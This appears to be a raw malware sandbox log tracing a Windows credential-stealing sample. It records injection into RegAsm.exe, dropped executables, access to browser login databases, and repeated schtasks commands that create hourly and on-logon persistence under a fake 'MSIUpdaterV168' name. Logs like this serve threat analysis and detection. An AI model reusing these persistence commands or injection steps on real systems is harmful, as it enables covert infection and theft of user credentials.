Source: RegAsm.exe, 00000018.00000002.2948532623.000000001A12A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2955355624.0000000020098000.00000002.00001000.00020000.00000000.sdmp, sqlt[1].dll.24.dr	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: _uGW_ubMqm8ALogin Data.3.dr, KiPY9kwddw5OLogin Data For Account.3.dr, AAFHII.24.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: RegAsm.exe, RegAsm.exe, 00000018.00000002.2948532623.000000001A12A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2955355624.0000000020098000.00000002.00001000.00020000.00000000.sdmp, sqlt[1].dll.24.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: RegAsm.exe, 00000018.00000002.2948532623.000000001A12A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2955355624.0000000020098000.00000002.00001000.00020000.00000000.sdmp, sqlt[1].dll.24.dr	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: zyJWi2vy29.exe	ReversingLabs: Detection: 68%
Source: zyJWi2vy29.exe	Virustotal: Detection: 43%

Source: RegAsm.exe

String found in binary or memory: https://www.maxmind.com/en/locate-my-ip-address

Source: unknown	Process created: C:\Users\user\Desktop\zyJWi2vy29.exe "C:\Users\user\Desktop\zyJWi2vy29.exe"
Source: C:\Users\user\Desktop\zyJWi2vy29.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\zyJWi2vy29.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\zyJWi2vy29.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 7548 -ip 7548
Source: C:\Users\user\Desktop\zyJWi2vy29.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7548 -s 324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe "C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe"
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8 HR" /sc HOURLY /rl HIGHEST
Source: unknown	Process created: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8 LG" /sc ONLOGON /rl HIGHEST
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe "C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe"
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8004 -s 284
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7268 -s 288
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\3f61nAONpe1PsLC0oJHy.exe "C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\3f61nAONpe1PsLC0oJHy.exe"
Source: unknown	Process created: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\3f61nAONpe1PsLC0oJHy.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\3f61nAONpe1PsLC0oJHy.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\3f61nAONpe1PsLC0oJHy.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7632 -s 136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915 HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915 LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe
Source: unknown	Process created: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe "C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe"
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: unknown	Process created: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\zyJWi2vy29.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\zyJWi2vy29.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea HR" /sc HOURLY /rl HIGHEST	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea LG" /sc ONLOGON /rl HIGHEST	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe "C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8 HR" /sc HOURLY /rl HIGHEST	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8 LG" /sc ONLOGON /rl HIGHEST	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe "C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a HR" /sc HOURLY /rl HIGHEST	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a LG" /sc ONLOGON /rl HIGHEST	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 7548 -ip 7548	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915 HR" /sc HOURLY /rl HIGHEST	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915 LG" /sc ONLOGON /rl HIGHEST	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe "C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Process created: unknown unknown
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\3f61nAONpe1PsLC0oJHy.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Process created: unknown unknown
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Process created: unknown unknown
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Process created: unknown unknown
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\zyJWi2vy29.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\zyJWi2vy29.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: slc.dll	Jump to behavior
